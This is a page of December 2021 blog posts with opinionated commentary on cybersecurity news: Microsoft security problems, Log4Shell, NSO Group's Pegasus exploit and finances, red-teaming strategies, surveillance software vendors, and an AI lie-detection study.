Microsoft Security? Just Super Duper
December 31, 2021
I installed software on one of my test machines. Windows’ Defender tool told me I had malware. Not true. To see what would happen, I clicked the offered Defender button and Windows killed a program from a developer doing business as Chris-PC. Helpful? You bet.
I mention this because I think I am the only person in Harrod’s Creek who believes that the Windows 11 release was a way to distract people from Microsoft’s security challenges. I like words like “challenges” and “misstep” because “dumpster fire” is too colorful and “disaster” has been overused.
What’s up with Microsoft security challenges as we creep toward what will be a banner year for some actors? How about these two news stories?
First, we have “Microsoft Teams Bug Allowing Phishing Unpatched Since March.” The main idea is that nine months have bustled by. Teams users could fall victim to some missteps in Microsoft Teams. The write up states:
German IT security consultancy firm Positive Security’s co-founder Fabian Bräunlein discovered four vulnerabilities leading to Server-Side Request Forgery (SSRF), URL preview spoofing, IP address leak (Android), and denial of service (DoS) dubbed Message of Death (Android). Bräunlein reported the four flaws to the Microsoft Security Response Center (MSRC), which investigates vulnerability reports concerning Microsoft products and services. “The vulnerabilities allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address and DoS’ing their Teams app/channels,” the researcher said. Out of the four vulnerabilities, Microsoft addressed only the one that attackers could use to gain access to targets’ IP addresses if they use Android devices.
Second, we have “Stealthy BLISTER Malware Slips in Unnoticed on Windows Systems.” I learned:
… Blister, acts as a loader for other malware and appears to be a novel threat that enjoys a low detection rate. The threat actor behind Blister has been relying on multiple techniques to keep their attacks under the radar, the use of code-signing certificates being only one of their tricks.
Nope, let’s block Windows 11 users from installing another browser. Let’s kill Chis-PC software. The path forward is to enter 2022 with the ghost of SolarWinds laughing and the ghosts of Christmas yet to come licking their lips in glee.
Stephen E Arnold, December 31, 2021
Log4Shell: Tough to Hide This Fire
December 28, 2021
Billy Joel is absolutely right when he sang the acclaimed song “We Didn’t Start The Fire” about the world’s slow demise. Unlike the planet, the Internet is regularly set ablaze and the demise is quick. The current flame is “Log4Shell” and it gives bad actors back doors into clouds and enterprise systems to steal data, download malware, erase information, and cause mayhem. AP News explores the breach in: “‘The Internet’s On Fire’ As Techs Race To Fix Software Flaw.”
The bug dubbed “Log4Shell” originated in open source Apache software used to run Web sites and other Web services. While open source software is a boon to the world, it is not updated as quickly as proprietary software. Amazon, for example, updates itself daily while systems running Apache only update at their owners’ behest.
Funny enough the “Log4Shell” vulnerability was first noticed in a children’s game:
“The first obvious signs of the flaw’s exploitation appeared in Minecraft, an online game hugely popular with kids and owned by Microsoft. Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box.Microsoft said it had issued a software update for Minecraft users. ‘Customers who apply the fix are protected, it said.”
Cyber security is not child’s play, but hacking is for some bad actors. Thankfully developers are working on a patch to prevent further damage. Security professionals really should not panicking and combine their knowledge to find a solution quicker.
A couple of points:
- The issue allegedly was disclosed by an Alibaba tech professional, possibly Chen Zhaojun
- China suspender an apparently “big” cyber security deal with Alibaba after the disclosure
Are these two actions connected; specifically, did China lose control of a really nifty zero day? Beyond Search thinks that the career trajectory of some Alibaba professionals will be interesting to watch. Are there IT jobs in Ürümqi?
Whitney Grace, December 28, 2021
Whitney Grace, December 27, 2021
DarkCyber for December 28, 2021, Now Available
December 28, 2021
This is the 26th program in the third series of DarkCyber video news programs produced by Stephen E Arnold and Beyond Search. You can view the ad-free show at this url. This program includes news of changes to the DarkCyber video series. Starting in January 2022, Dark Cyber will focus on smart software and its impact on intelware and policeware. In addition, Dark Cyber will appear once each month and expand to a 15 to 20 minute format.
What will we do with the production time? We begin a new video series called “OSINT Radar.” OSINT is an acronym for open source intelligence. In a December 2021 presentation to cyber investigators, the idea surfaced of a 60 second profile of a high value OSINT site. We have developed this idea and will publish what we hope will be a weekly video “infodeck” in video form of an OSINT resource currently in use by law enforcement and intelligence professionals. Watch Beyond Search for the details of how to view these short, made-for-mobile video infodecks. Now when you swipe left, you will learn how to perform free reverse phone number look ups, obtain a list of a social media user’s friends, and other helpful data collection actions from completely open source data pools.
Also, in this DarkCyber program are: [a] the blame for government agencies and specialized software vendors using Facebook to crank out false identities. Hint: It’s not the vendors’ fault. [b] why 2022 will be a banner year for bad actors. No, it’s not just passwords, insiders, and corner-cutting software developers. There is a bigger problem. [c] Microsoft has its very own Death Star. Does Microsoft know that the original Death Star was a fiction and it did not survive an attack by the rebels?, and [d] a smart drone with kinetic weapons causes the UN to have a meeting and decide to have another meeting.
Kenny Toth, December 28, 2021
Log Exploits, Pegasus Methods, and Willful Ignorance
December 21, 2021
Which of the “our hair is on fire” articles should I reference. There’s the “worse security issue ever” approach of the Security Now podcast. The Google released an analysis of NSO Group’s Pegasus methods. There’s the happy discovery story and community centric notification by an engineer working at a Chinese company. There’s Canada’s turning off quite a few essential government Web sites. And more. Lots more.
My take is that these post SolarWinds’ missteps are going to come faster and more furiously with or without Microsoft’s magical 1,000 engineers beavering away in lovely Moscow.
Why?
Three reasons, and I know these will not be particularly popular among the thumbtypers, the funders of venture backed cyber security firms, and the open source community. Hey, life is tough.
1. Good Enough
In order to reduce costs and move faster, good enough is the key business practice to have emerged in the last decade. Systems are assembled via chunks of code, APIs, and scripts conjured from online sources. As a result, there are obviously some egregious issues. The SolarWinds’ misstep is one example. The hair on fire over Java is another. We have a ring side seat to the Kendara start up which was sold to @Home which may have been AT&T, Java was exciting indeed. Now Java is different? Sorry. It’s good enough. Why not do “better”? It takes effort, money, and time. Foosball and making designer coffee are more important for some.
2. Open Source and the Community
Yeah, the appeal of free software, no proprietary software license agreements, and the ability to make changes which — ha ha ha — which coulda woulda shoulda been shared with the community are powerful rocket engines for open source applications. Now everything from Elasticsearch to the latest mobile device is like a clueless elderly person negotiating with a New York real estate wizard. You know who is going to win, right? The community is often a front for a commercial interest, a way for a developer to get a job, or a clever programmer to drive business to a consulting side gig. Who knows who will cobble together enough open source to solve one of the persistent problems with computing. The issue is that the “community” is not homogeneous and the fruit cake of code is neither subjected to testing for security issues or reworked to make it just more wonderful. Without an incentive, open source is almost as juicy a bad actor opportunity as that wonderful Microsoft Exchange “solution.”
3. Kick the Can Down the Road
In my more than 50 year work career, the most frequent answer to a persistent problem has been to find something expedient to ameliorate a problem. Then kick the can down the road for subsequent managers, programmers, and summer interns to solve. Whether the issue is the security of home smart devices or hidden vulnerabilities of a $200,000 per year piece of smart software infused with Snorkel goodness, just focus on the short term. Those larger issues? Hey, what are those? Just walk away from the dead whales on the beach. Technology and tomorrows will solve the less visible, longer term problems.
Net Net
What’s the fix for the hair on fire crowd? Oh, upgrade to the more secure version. License a smart system like Antigena. Introduce a new cyber threat information service. See how easy it is to operate in a digital world in which the vast majority of people are thrilled with the computing status quo. Life will be more secure and even better in the metaverse too.
Stephen E Arnold, December 20, 2021
Google and Its Penchant for Bold Assertions
December 17, 2021
Google claimed quantum supremacy. Recently Google’s engineers studied the technology of the NSO Group and according to “A Deep Dive into an NSO Zero-Click iMessage Exploit: Remote Code Execution” found the “most technically sophisticated exploit ever seen.” The analysis is thorough and reflects considerable enthusiasm for disentangling some of the inner workings of Apple’s mobile operating system. I can almost hear the chuckles of the Google engineers as they figured out how the NSO Group compromised iPhones simply by sending the unlucky target a message packet.
Several observations:
- The NSO Group talks with other entities (people from university, a military unit, colleagues at limited attendance conference, etc.). Consequently information about methods seeps into the intelware community. This community is not quite like the Yacht Club in Manhattan, but it is similar: Traditions, friendships, bon homie, and the like.
- Intelware developers associated with other countries often gain access to specialized tools and services via connections with a nation state which is a customer of an specialized services firm, say, for argument’s sake, the NSO Group. It is probable that other entities have examined and replicated some of the NSO Group’s systems and methods. The fact that Google figured out the system and methods of this particular NSO Group service means that other groups can too. (It is possible that some at Google believe that their work is singular and not replicable. Yeah, high school science club thinking, perhaps?)
- Due to the connection between high value targets and the cachet of the Apple iPhone, figuring out how to penetrate an iPhone is a high value activity. Apple’s engineers are bright and were in their high school science clubs as well. However, engineers do not design to prevent unforeseeable flaws in their engineering innovations. This means that iPhones have flaws. When a device is the focus of attention of numerous nation states’ intelligence services, commercial enterprises in the zero day business, and companies with staff trained by military intelligence organizations — flaws will be found. My Arnold Rule for this situation is that insights will be discovered of which the original developer had no clue.
Kudos to Google for the NSO Group information. However, like quantum supremacy, the statements about the sophistication of the exploit are a bit like the claim for quantum supremacy. There are other entities in the Intel world which have capabilities which will surprise the “experts” just now discovering the world of intelware. Nice paper, very academic, but it reveals a disconnect between the world of the commercial researcher and the robust, broad intelware ecosystem.
Stephen E Arnold, December 17, 2021
How Are Those Cyber Security Strategies Working, Java Fans?
December 16, 2021
As hackers’ methods evolve, so do efforts to thwart them. The SmartData Collective describes “3 Strategies Employed by the Leading Enterprise Cybersecurity Platforms.” We wonder whether the FBI implemented these methods. If so, we think the recent hack of that agency’s systems raises some questions. That case aside, writer Matt James’ reports:
“Stephanie Benoit-Kurtz, Lead Area Faculty Chair for the University of Phoenix’s Cybersecurity Programs, offers a good summary of the changes security organizations should anticipate, especially in the time of the pandemic. ‘The threat landscape over the past 18 months has significantly changed in complexity and frequency of attacks. Long gone are the days when a lone wolf attacker was manually knocking at the door.’ To get acquainted with the ways security firms are handling the new breed of threats in cyberspace, here’s a rundown of the notable strategies the leading cybersecurity platforms and security firms are offering.”
First up is breach and attack simulation, or BAS. As the name implies, this cybersecurity platform feature tests systems for potential weaknesses. Next we learn about continuous automated red teaming (CART). Red teaming is the labor-intensive practice of having a group of white-hat hackers test one’s system for vulnerabilities. It has gotten difficult for mere humans to keep up, though, so automating the process was the logical next step. Finally, there is advanced purple teaming. This color-blending method relies on collaboration between test-attackers (red) and defense teams (blue). This seems so obvious we wonder why it was not being done all along, but apparently departmental silos are resistant to common sense. See the write-up for details on each of these approaches. James concludes:
“Many of the world’s top cybersecurity platforms and security solution providers have already embraced breach and attack simulation, continuous automated red teaming, and advanced purple teaming. These strategies in securing organizations may be relatively new, but cybersecurity professionals can vouch for their effectiveness in view of the new kinds of problems presented by cunning malicious actors in cyberspace.”
This may be true, but these measures will only work if companies, and agencies, actually put them in place. Organizations that drag their feet on security are taking a real risk. Yep, open source Java tools. No problem, right?
Cynthia Murrell, December 16, 2021
Specialized Software Vendors: Should They Remember the Domino Theory?
December 15, 2021
Lining up dominoes, knocking one down, and watching the others in a line react to what some non-nuclear types call a chain reaction is YouTube fodder. One can watch geometric growth manifested in knocked down dominoes. Click here for the revelation. We may have some domino action in the specialized software and services market. This “specialized software and services” is my code word for developers of intelware and policeware.
“US Calls for Sanctions against NSO Group and Other Spyware Firms” reports:
a group of politicians (including Senate Finance Committee chair Ron Wyden, House Intelligence Committee chair Adam Schiff and 16 other Democrats) accuses NSO and three other foreign surveillance firms of helping authoritarian governments to commit human rights abuses.
And what firms are the intended focus of this hoped for action? According to the write up, the companies are:
- Amesys (now called Nexa Technologies). This was a company which found purchase in some interesting countries bordering the Mediterranean, garnered some attention, and morphed into today’s organization.)
- DarkMatter (based in United Arab Emirates). This is an interesting outfit which has allegedly recruited in the US and possibly developed a super duper secure mobile device. The idea was to avoid surveillance. Right?
- Trovicor (based in Germany) once was allegedly a unit of Nokia Siemens Networks and is mentioned in a fiery write up called “Explosive Wikileaks Files Reveal Mass Interception of Entire Population.” That’s a grabber headline I suppose. True or false? I have zero idea but it illustrates the enthusiasm some evidence when realizing that interesting companies provide some unique services to their customers.
The reason for the hand waving is the publicity the NSO Group has inadvertently generated.
Will the knock on NSO Group have an impact on Amesys Nexa, DarkMatter, and Trovicor? Those YouTube videos may foreshadow what might happen if government officials look for the more interesting and more technologically advanced specialized software and services companies. Where can one find a list of such organizations? Perhaps the developer of the new OSINT service knows? Curious? Write darkcyber333 @ yandex dot com.
Stephen E Arnold, December 15, 2021
DarkCyber for December 14, 2021, Now Available
December 14, 2021
The December 14, 2021, Dark Cyber video news program is now available on the Beyond Search Web log and YouTube at this link.
Program number 25 for 2021 includes five stories.
The first is that a list of companies engaged in surveillance technology and specialized software for law enforcement and intelligence professionals is available without charge. The list is not comprehensive, but it is one of the first open source documents which identifies companies operating “off the radar” of many analysts, law enforcement professionals, private detectives, and would-be investigative journalists.
The second story adds another chapter to the chronicle of missteps by a company doing business as NSO Group. The Israel company develops and licenses specialized software to government agencies. However, the use of that software has become problematic. This edition of Dark Cyber reports about the alleged use of the Pegasus mobile phone data collection system to obtain information from US diplomats’ mobile devices. The consequences of MBA thinking have roiled the specialized services market worldwide.
The third story extracts pricing information made public by the Brennan Center. The documents obtained via a FOIA request to California were prepared by the Los Angeles Police Department. Although redacted, the documents contained what appears to be trade secret pricing information about the Voyager Labs’ surveillance data analytics system marketed worldwide. The Dark Cyber story reveals how to download the document
collection and additional details about a very low profile company’s technology and methods.
The fourth story describes new digital cameras which are the size of a grain of salt. Dark Cyber then reveals that
a small roll up drone has been developed. The form factor is similar to a seed which spins as it floats to the
ground. Combining the miniature cameras with the seed-like phone factor creates opportunities for a new approach to video surveillance.
The final story announces a new Dark Cyber service. The weekly Instagram post will provide specific information about Web sites now used by law enforcement, analysts, and intelligence professionals to gather data about persons of interests, the social media activities, their location, and other high-value facts. The new service goes live in January 2022.
Dark Cyber is produced by Stephen E Arnold, who publishes the Web log called Beyond Search and available at this link.
Kenny Toth, December 14, 2021
NSO Group: How about That Debt?
December 14, 2021
The NSO Group continues to make headlines and chisel worry lines in the faces of the many companies in Israel which create specialized software and systems for law enforcement and intelligence professionals. You can read the somewhat unpleasant news in Bloomberg’s report, the Financial Times’ article, and Gizmodo’s Silicon Valley-esque write up. Gizmodo said:
the company’s cumbersome mixture of unpaid debts and growing international scrutiny have made NSO a bloated pariah and is forcing its leadership to consider shutting down its Pegasus spyware unit. Selling the entire company is also reportedly on the table.
First, the reports suggest, without much back up, that NSO Group has about a half a billion US in debt. This is important because it underscores what is the number one flaw in the jazzy business plans of companies making sense of data and providing specialized services to law enforcement, intelligence, and war fighting entities. Here’s my take:
Point 1. What was secret is now open and easily available information.
Since Snowden, the systems and methods informing NSO Group and dozens of similar firms are easy to grasp. Former intelligence professionals can blend what Snowden revealed with whatever these individuals picked up in their service to their country, create a “baby” or “similar” solution and market it. This means that there are more surveillance, penetration, intercept, and analysis options available than at any other time in my 50 year career in online information and systems. Toss in what’s in the wild from dumps of FinFisher and Hacking Team techniques and the gold mine of open source code, and it should be no surprise that the NSO Group’s problem is just the tip of an iceberg, a favorite metaphor in the world of surveillance. None of the newsy reports grasp the magnitude of the NSO Group problem.
Point 2. There’s a lot of “smart” money chasing a big pay day from software purpose built for law enforcement, intelligence, and military operations. VC cows in herds, however, are not that smart or full of wisdom.
There are many investors who buy the line “cyber crime and terrorism” drive big, lucrative sales of specialized software and systems. That’s partially correct. But what’s happened is that the flood of cash has generated a number of commercial enterprisers trying to covert those dollars into highly reliable, easy to use systems. The presentations at off the radar trade shows promise functionality that is almost science fiction. The situation today is that there is a lot of hyper marketing going on because there’s money to apply some very expensive computational methods to what used to be largely secret and manual work. A good case for the travails of selling and keeping customers is the Palantir Technologies’ journey which is more than a decade long and still underway. The marketing is seeping from conferences open only to government agencies and those with clearances to advertising trade shows. I think you can see the risk of moving from low profile or secret government solutions to services for Madison Avenue. I sure can.
Point 3. Too few customers to go around.
There are not enough government customers with deep pockets for the abundant specialized services and systems which are on offer. In this week’s DarkCyber at this link, you can learn about the vendors at conferences where surveillance and applied information collection and analysis explain their products and services. You can also learn that the Brennan Center has revealed documents obtained via FOIA about Voyager Labs, a company which is also engaged in the specialized software and services business. Our DarkCyber report makes clear that license fees are in six figures and include more special add ins than a deal from a flea market vendor selling at the Clignancourt flea market. Competition means prices are falling, and quite effective systems are available for as little as a few hundred dollars per month and sometimes even less. Plus, commercial enterprises are often nervous when the potential customer realizes the power of specialized software and services. Stalking made easy? Yep. Spying on competitors facilitated? Yep. Open source intelligence makes it possible to perform specialized work at a quite attractive price point: Free or a few hundred a month.
What’s next?
Financial wizards may be able to swizzle the NSO Group’s financial pickles into a sweet relish for a ball park frank. There will be other companies in this sector which will face comparable money challenges in the future. From my perspective, it is not possible to put the spilled oil back in the tanker and clean the gunk off the birds now coated in crude.
Policeware and intelware vendors have operated out of sight and out of mind in their bubble since i2 Ltd. in the late 19909s rolled out the Analysts Notebook solution and launched the market for specialized software. The NSO Group’s situation could be or has already shoved a hat pin in that big, fat balloon.
More significantly, formerly blind and indifferent news organizations, government agencies, and potential investors can see what issues specialized software and services pose. More reporting will be forthcoming, including books that purport to reveal how data aggregators are spying on hapless Instagram and TikTok users. Like most of the downstream consequences of the so called digital revolution, NSO Group’s troubles are the tip of an information iceberg drifting into equatorial waters.
Stephen E Arnold, December 14, 2021
AI-Powered Alternative to Polygraph Emerging out of Israel
December 6, 2021
Will AI eventually replace the polygraph in discerning truth from falsehood? The Times of Israel suggests we may be heading that direction in, “Liar, Liar! ‘Reading’ Faces, Israeli Tech Spots Fibbers with 73% Accuracy.” The emerging technology is the project of a team at Tel Aviv University. Writer Nathan Jeffay reports:
“Israeli scientists say they have found a way to ‘read’ minuscule movements in the face in order to spot fibbers, and have done so with 73 percent accuracy. With highly sensitive electrodes placed to detect the smallest of movements by facial muscles, the researchers got their subjects to either speak truthfully or lie. They fed details on the patterns of those facial movements into an artificial intelligence tool, and taught it to determine whether other people are lying or telling the truth. Now, they are aiming to teach the AI tool to analyze face movements without electrodes. Instead, they want to develop the tech to follow faces in order to determine truthfulness via cameras — which could enable them to spot a liar from dozens of meters away.”
A 73% accuracy rate would leave a lot of room for false accusations. It is considerably smaller than the estimated 87% accuracy rate of polygraph tests (a figure that is itself contested). Researchers promise, however, accuracy will improve as development continues. The approach, we’re told, has a significant advantage over polygraphs, which some subjects can fool by regulating their heart rate, blood pressure, and breathing. Regarding the examination of facial muscles instead, researcher Kino Levy states:
“We knew before now that facial expressions that are manifested by contractions in face muscles represent various emotions. … But up until now when people tried to identify these small movements in face muscles, we can’t do—our brains and our perception aren’t fast or sophisticated enough to pick up these tiny movements in the face. Many studies have shown that it’s almost impossible for us to tell when someone is lying to us. Even experts, such as police interrogators, do only a little better than the rest of us.”
This specially tailored AI, however, can accurately interpret these movements; 73% of the time, anyway. Levy insists his team’s technology will be a game changer. Once they have been able to improve accuracy, of course.
And here’s a question for Israeli companies with specialized software, “Are your systems used to hack American elected officials?”
Cynthia Murrell, December 6, 2021